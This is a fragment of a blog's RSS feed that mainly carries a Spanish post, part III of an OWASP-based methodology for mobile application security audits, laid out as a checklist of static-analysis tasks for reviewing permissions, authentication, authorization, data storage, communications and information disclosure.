border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=8SwXdaZm_Q8:OmdXPN0PIyU:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=8SwXdaZm_Q8:OmdXPN0PIyU:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=8SwXdaZm_Q8:OmdXPN0PIyU:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SXato2/~4/8SwXdaZm_Q8" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/SXato2/~3/8SwXdaZm_Q8/metasploit-shell-to-meterpreter.html</link><author>noreply@blogger.com (Julián Gonzalez)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-xSyeGGoJyYI/UWKEMwGm0HI/AAAAAAAAEPc/r59jczayNfw/s72-c/Metasploit_Shell_to_meterpreter.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.seguridadparatodos.es/2013/04/metasploit-shell-to-meterpreter.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8268567775100190466.post-2261501182765838453</guid><pubDate>Mon, 08 Apr 2013 11:15:00 +0000</pubDate><atom:updated>2013-04-08T13:30:58.053+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Apps</category><category domain="http://www.blogger.com/atom/ns#">Seguridad Móviles</category><category domain="http://www.blogger.com/atom/ns#">OWASP</category><category domain="http://www.blogger.com/atom/ns#">parte 3</category><category domain="http://www.blogger.com/atom/ns#">Metodología</category><category domain="http://www.blogger.com/atom/ns#">Aplicaciones</category><title>OWASP: METODOLOGÍA PARA ANÁLISIS DE SEGURIDAD EN APLICACIONES MÓVILES (III)</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-TuYxepHRfnU/UWKhpxqqppI/AAAAAAAAEPs/Tc6xLaUWwPo/s1600/OWASP_Part3.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/-TuYxepHRfnU/UWKhpxqqppI/AAAAAAAAEPs/Tc6xLaUWwPo/s1600/OWASP_Part3.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;&lt;br /&gt; &lt;br /&gt; &lt;br /&gt; &lt;br /&gt; &lt;br /&gt; &lt;br /&gt; &lt;br /&gt; &lt;br /&gt; &lt;br /&gt; &lt;br /&gt;&lt;span style="border: 0px; color: #777777; font-family: Arial, 'Century gothic', sans-serif; font-size: xx-small; line-height: 18px; list-style: none; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"&gt;&lt;span style="background-color: #6fa8dc; border: 0px; font-style: inherit; list-style: none; margin: 0px; outline: 0px; padding: 0px; text-align: start; vertical-align: baseline;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;div&gt;
&lt;div style="text-align: justify;"&gt;
En la primera y segunda parte se ha realizado un&amp;nbsp;análisis&amp;nbsp;de la información (gathering) con el objetivo de disponer de una completa visión sobre la aplicación (alcance y magnitud). En este artículo se van a describir los pasos para realizar una completa revisión del código fuente de la aplicación, es lo que se conoce como&amp;nbsp;&lt;b&gt;Análisis&amp;nbsp;Estático&lt;/b&gt;.&lt;/div&gt;
&lt;br /&gt;
&lt;span style="background-color: #0c343d; font-size: x-small;"&gt;&lt;span style="color: white;"&gt;INDICE: &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;div&gt;
&lt;span style="font-size: x-small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="background-color: white; border: 0px; color: #777777; font-family: Arial, 'Century gothic', sans-serif; font-size: xx-small; line-height: 18px; list-style: none; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"&gt;&lt;span style="border: 0px; font-style: inherit; list-style: none; margin: 0px; outline: 0px; padding: 0px; text-align: start; vertical-align: baseline;"&gt;-&amp;nbsp;&lt;/span&gt;&lt;a href="http://www.seguridadparatodos.es/2013/02/OWASP-Parte1MetodologiaAppMobile.html" style="border: 0px; color: #ff9d00; font-style: inherit; list-style: none; margin: 0px; outline: none; padding: 0px; text-decoration: none; vertical-align: baseline;" target="_blank"&gt;OWASP: Metodología para análisis de Seguridad en Aplicaciones Móviles (I)&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: white; border: 0px; color: #777777; font-family: Arial, 'Century gothic', sans-serif; font-size: xx-small; line-height: 18px; list-style: none; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"&gt;&lt;span style="border: 0px; font-style: inherit; list-style: none; margin: 0px; outline: 0px; padding: 0px; text-align: start; vertical-align: baseline;"&gt;-&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style="background-color: white; border: 0px; color: #777777; font-family: Arial, 'Century gothic', sans-serif; font-size: xx-small; line-height: 18px; list-style: none; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"&gt;&lt;a href="http://www.seguridadparatodos.es/2013/02/OWASP-Parte2MetodologiaAppMobile.html" style="border: none; color: #006acd; list-style: none; margin: 0px; outline: none; padding: 0px; text-decoration: none;" target="_blank"&gt;OWASP: Metodología para análisis de Seguridad en Aplicaciones Móviles (II)&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: white; border: 0px; color: #777777; font-family: Arial, 'Century gothic', sans-serif; font-size: xx-small; line-height: 18px; list-style: none; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"&gt;-&amp;nbsp;&lt;/span&gt;&lt;span style="background-color: white; border: 0px; color: #777777; font-family: Arial, 'Century gothic', sans-serif; font-size: xx-small; line-height: 18px; list-style: none; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"&gt;&lt;a href="http://www.seguridadparatodos.es/2013/04/OWASP-Parte3MetodologiaAppMobile.html" target="_blank"&gt;OWASP: Metodología para análisis de Seguridad en Aplicaciones Móviles (III)&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;E2: Static Analysis&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
En esta etapa se llevará a cabo una &lt;b&gt;revisión del código fuente de la aplicación&lt;/b&gt;, esto puede realizarse de dos formas diferentes:&lt;br /&gt;
&lt;br /&gt;
1 . Obteniendo el código fuente disponible y proporcionado por el equipo de desarrollo de la aplicación. En caso de ser una aplicación open-source, se accedería a su repositorio&amp;nbsp;público.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;
2. Utilizando ingeniería inversa, de forma que se obtiene el código de la aplicación utilizando de-compiladores y herramientas de manipulación a bajo nivel.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;
&lt;div&gt;
Desde el punto de la seguridad &lt;b&gt;los mejores resultados&lt;/b&gt; de una&amp;nbsp;auditoria&amp;nbsp;de aplicaciones se suceden cuando &lt;b&gt;se tiene pleno acceso al código fuente de la aplicación&lt;/b&gt;, y se dispone de un entorno de pruebas para la ocasión.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
A continuación, se detallan las actividades y tareas en las que se divide una&amp;nbsp;&lt;b&gt;&lt;span style="color: #990000;"&gt;Auditoria de código&lt;/span&gt;&lt;/b&gt;&amp;nbsp;para aplicaciones móviles.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #134f5c;"&gt;&lt;span style="color: white;"&gt;&lt;b&gt;E2.A1&lt;/b&gt;:&amp;nbsp;&lt;u&gt;Requisitos necesarios para la&amp;nbsp;Auditoria&amp;nbsp;de Código &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;E2.A1.T1&lt;/b&gt;&amp;nbsp;Obtener el código fuente de la aplicación a auditar.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;
&lt;b&gt;E2.A1.T2&lt;/b&gt;&amp;nbsp;Revisión e identificación de los permisos requeridos por la aplicación (AndroidManifest.xml, iOS Entitlements).&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;
&lt;b&gt;E2.A1.T3&lt;/b&gt;&amp;nbsp;Revisión de las configuración de la aplicación en busca de estados incompletos o errores, configuración insegura, etc.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;
&lt;b&gt;E2.A1.T4&lt;/b&gt;&amp;nbsp;Identificación y listado de las librerías de terceros utilizadas por la aplicación móvil.&amp;nbsp;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;
&lt;b&gt;E2.A1.T5&lt;/b&gt;&amp;nbsp;Comprobar si el dispositivo Android es posible obtener acceso root / jailbreak, si es así, buscar información sobre como es posible realizar con éxito el proceso.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;
&lt;b&gt;E2.A1.T6&lt;/b&gt;&amp;nbsp;Revisar e identificar las&amp;nbsp;librerías&amp;nbsp;dinámicas que son cargadas por la aplicación para su funcionamiento.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;
&lt;b&gt;E2.A1.T7&lt;/b&gt;&amp;nbsp;Identificar los permisos que la aplicación solicita para su funcionamiento, y comprobar que dichos permisos son realmente necesarios para su correcto funcionamiento, algunas aplicaciones requieren más permisos de los que realmente necesita.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;
&lt;b&gt;E2.A1.T8&lt;/b&gt;&amp;nbsp;Identificar los puntos de entrada de información, y comprobar los controles de seguridad aplicados, Ejemplos:&lt;br /&gt;
&lt;ul&gt;
&lt;/ul&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;gt; Recepción de datos de otras aplicaciones | sanitización de input / output data&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;gt; Recepción de SMS&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;gt; Lectura de datos de una WEB&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;gt; Lectura de datos de un fichero almacenado en la tarjeta SD.&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
&lt;span style="background-color: #134f5c;"&gt;&lt;span style="color: white;"&gt;&lt;b&gt;E2.A2:&lt;/b&gt;&amp;nbsp;&lt;u&gt;Revisión del proceso de Autenticación &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;
&lt;b&gt;E2.A2.T1&lt;/b&gt;&amp;nbsp;Identificar las líneas de código que se encargan de manejar la autenticación de los usuarios a través de la interfaz gráfica.&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;E2.A2.T2&lt;/b&gt;&amp;nbsp;Analizar y evaluar el posible uso de técnicas de ataques de fuerza bruta para la obtención del acceso.&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;E2.A2.T3&lt;/b&gt;&amp;nbsp;Identificar y determinar que otros métodos, aparte del user / password, utiliza la aplicación:&lt;br /&gt;
&lt;ul&gt;
&lt;/ul&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;gt; Token&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;gt; Información contextual (localización, IMEI, etc)&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;gt; Certificados&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;gt; Gestión de las sesiones de usuario (intercambios de información de forma segura, etc)&lt;br /&gt;
&lt;b&gt;&lt;/b&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/b&gt;&lt;/div&gt;
&lt;b&gt;
E2.A2.T4&lt;/b&gt;&amp;nbsp;En caso, de detectar la utilización de métodos visuales como método de contraseña, se deberá revisar el método de mapeado utilizado con objeto de verificar que se utiliza con un adecuado nivel de entropia.&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;E2.A2.T5&lt;/b&gt;&amp;nbsp;En caso, de que la aplicación se comunique con otras aplicaciones, se por el medio que sea (WiFi Direct, Android Beam, NFC, etc), se deberá revisar la gestión adecuada de la autenticación remota de los usuarios, prestando especial&amp;nbsp;interés&amp;nbsp;en la gestión de los errores de autenticación (fail logon).&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;E2.A2.T6&lt;/b&gt;&amp;nbsp;En caso de utilizar el método Single Sign On, identificar que método esta &amp;nbsp;utilizando (librerias,etc)&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;E2.A2.T7&lt;/b&gt;&amp;nbsp;Si se utiliza los SMS para la autenticación, comprobar que no se transmite información sensible comprometedora, utilización de OTP (Password de una sola vez), ¿Que otras aplicaciones tiene acceso a dichos datos?&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;E2.A2.T8&lt;/b&gt;&amp;nbsp;En caso de utilizar las notificaciones Push ¿Como gestionar la aplicación la verificación de la identidad del servidor de los datos?&lt;br /&gt;
&lt;ul&gt;
&lt;/ul&gt;
&lt;div&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
&lt;span style="background-color: #134f5c;"&gt;&lt;span style="color: white;"&gt;&lt;b&gt;E2.A3:&lt;/b&gt;&amp;nbsp;&lt;u&gt;Revisión de los niveles de Autorización de la aplicación &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;u&gt;&lt;br /&gt;
&lt;/u&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;E2.A3.T1&lt;/b&gt;&amp;nbsp;Identificar y revisar los permisos que se aplican sobre los ficheros creados durante la ejecución de la aplicación.&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;E2.A3.T2&lt;/b&gt;&amp;nbsp;Verificar que la aplicación no tiene acceso a otras funcionalidades fuera de los establecido en su rol.&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;E2.A3.T3&lt;/b&gt;&amp;nbsp;Identificar y localizar puntos potenciales de escalada de privilegios como son:&lt;br /&gt;
&lt;ul&gt;
&lt;/ul&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;gt; Bases de datos&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;gt; Fichero en texto plano&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;gt; HTTP&lt;br /&gt;
&lt;b&gt;&lt;/b&gt;&lt;br /&gt;
&lt;div&gt;
&lt;b&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/b&gt;&lt;/div&gt;
&lt;b&gt;
E2.A3.T4&lt;/b&gt;&amp;nbsp;Identificar puntos conflictivos del código fuente de la aplicación que pueden saltarse el flujo normal de funcionamiento de la misma. Ejemplo: Puntos de excepción.&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;E2.A3.T5&lt;/b&gt;&amp;nbsp;En caso, de tratarse de una aplicación con licencia, se debe examinar con detalle el método y el procedimiento de gestión de la misma: resgitro, activación, modificación, expiración, etc.&lt;br /&gt;
&lt;ul&gt;
&lt;/ul&gt;
&lt;div&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
&lt;span style="background-color: #134f5c;"&gt;&lt;span style="color: white;"&gt;&lt;b&gt;E2.A4&lt;/b&gt;:&amp;nbsp;&lt;u&gt;Revisión de los métodos de almacenamiento de Información &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;E2.A4.T1&lt;/b&gt;&amp;nbsp;Cifrado de la Información&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;gt; Identificación de los algoritmo de cifrado utilizados.&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;gt; Examinar el método de&amp;nbsp;gestión&amp;nbsp;de la claves de cifrado.&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;gt; Identificar los puntos&amp;nbsp;débiles&amp;nbsp;de dicho método de cifrado.&lt;br /&gt;
&lt;b&gt;&lt;/b&gt;&lt;br /&gt;
&lt;div&gt;
&lt;b&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/b&gt;&lt;/div&gt;
&lt;b&gt;
E2.A4.T2&lt;/b&gt;&amp;nbsp;Identificación y localización de los puntos donde la aplicación almacena cualquier tipo de información (tmp, SD, etc..), incluidos los servicios de backup en la nube (Dropbox, Google Drive, etc)&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;E2.A4.T3&lt;/b&gt;&amp;nbsp;Analizar el tipo de información expuesta a API de terceros, como por ejemplo: el acceso a los contactos.&lt;/div&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
&lt;div&gt;
&lt;span style="background-color: #134f5c;"&gt;&lt;span style="color: white;"&gt;&lt;b&gt;E2.A5:&lt;/b&gt;&amp;nbsp;&lt;u&gt;Gestión de las comunicaciones Seguras &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;E2.A5.T1&lt;/b&gt;&amp;nbsp;Identificación y&amp;nbsp;análisis&amp;nbsp;de uso de los&amp;nbsp;métodos&amp;nbsp;de conexión accesibles por la aplicación (WiFi, 3G, etc)&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;E2.A5.T2&lt;/b&gt;&amp;nbsp;Análisis&amp;nbsp;de la gestión de la conexión segura de la aplicación al pasar de un medio de comunicación a otro. Ej: pasar de estar conectado con WiFi a 3G, o incluso utilización mixta.&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;E2.A5.T3&lt;/b&gt;&amp;nbsp;&amp;nbsp;Identificación y verificación de los certificados utilizados por la aplicación.&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;E2.A5.T4&lt;/b&gt;&amp;nbsp;Análisis&amp;nbsp;de los certificados: caducidad, autoridad de certificación, válidez, revocación, seguridad, etc.&lt;br /&gt;
&lt;ul&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="background-color: #134f5c;"&gt;&lt;span style="color: white;"&gt;&lt;b&gt;E2.A6&lt;/b&gt;:&amp;nbsp;&lt;u&gt;Información Sensible Accesible (Information Disclosure) &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;u&gt;&lt;br /&gt;
&lt;/u&gt; &lt;br /&gt;
&lt;b&gt;E2.A6.T1&lt;/b&gt;&amp;nbsp;Identificación&amp;nbsp;de los puntos de exposición de información. Ejemplo: logs, cache, archivos de configuración, etc.&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;E2.A6.T2&lt;/b&gt;&amp;nbsp;Análisis&amp;nbsp;de los puntos de exposición de información (PEI) para identificar posibles fugas de información sensible.&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;E2.A6.T3&lt;/b&gt;&amp;nbsp;Verificación de los PEI en los mensajes de error de la aplicación. Asegurarse que estos mensajes son correctamente gestionados&amp;nbsp;impidiendo&amp;nbsp;que se muestre información considerada sensible.&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;E2.A6.T4&lt;/b&gt;&amp;nbsp;Identificar y evaluar la información accesible e intercambiada por las&amp;nbsp;librerías&amp;nbsp;(API) de terceros.&lt;br /&gt;
&lt;ul&gt;
&lt;/ul&gt;
&lt;br /&gt;
Por&amp;nbsp;ultimo&amp;nbsp;si la aplicación (Apps) es una versión WEB para móviles, se&amp;nbsp;deberán&amp;nbsp;de tener en consideración las vulnerabilidades WEB, es decir, Analizar la aplicación en busca de:&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;gt; XSS y HTML Injection.&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;gt; Command Injection (si la aplicación utiliza una shell para desarrollar parte de sus tareas)&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;gt; SQL Injection (si utiliza base de datos, o se comunica con alguna)&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;gt; Gestión de sesiones (Cookies)&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;gt; Proceso de Autenticación&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;gt; Seguridad en HTML5&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;
En todo&amp;nbsp;análisis&amp;nbsp;estático&amp;nbsp;&lt;b&gt;es muy&amp;nbsp;útil&amp;nbsp;&lt;/b&gt;realizar&amp;nbsp;búsqueda&amp;nbsp;en el código de cadenas de caracteres y expresiones regulares, &amp;nbsp;ya que estas podrían estar relacionadas con puntos de entrada / salida de Datos.&lt;br /&gt;
&lt;br /&gt;
Con esto finalizaría el&amp;nbsp;&lt;u&gt;Análisis&amp;nbsp;estático&lt;/u&gt;&amp;nbsp;de la aplicación móvil, pasando a continuación a evaluar y analizar la seguridad de la aplicación en funcionamiento, es lo que se conoce&amp;nbsp;Análisis&amp;nbsp;Dinámico.&lt;br /&gt;
&lt;br /&gt;
Pero esto, daría para hablar de ello en otra serie de artículos. Espero que os haya gustado, si es así no&amp;nbsp;olvidéis&amp;nbsp;compartirlo por la redes sociales.&lt;br /&gt;
&lt;br /&gt;
Gracias,&lt;br /&gt;
un Saludo.&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;REFERENCIAS&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
[1]&amp;nbsp;&lt;a href="https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Security_Testing_Guide" target="_blank"&gt;OWASP:&amp;nbsp;Security Testing Guide&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
[2]&amp;nbsp;&lt;a href="http://www.slideshare.net/JackMannino/owasp-top-10-mobile-risks#btnNext" target="_blank"&gt;OWASP: Top Ten Mobile Risks&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
[3]&amp;nbsp;&lt;a href="https://www.owasp.org/index.php/OWASP_Mobile_Security_Project" target="_blank"&gt;OWASP: Mobile Security Proyects&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;&lt;div class="feedflare"&gt;
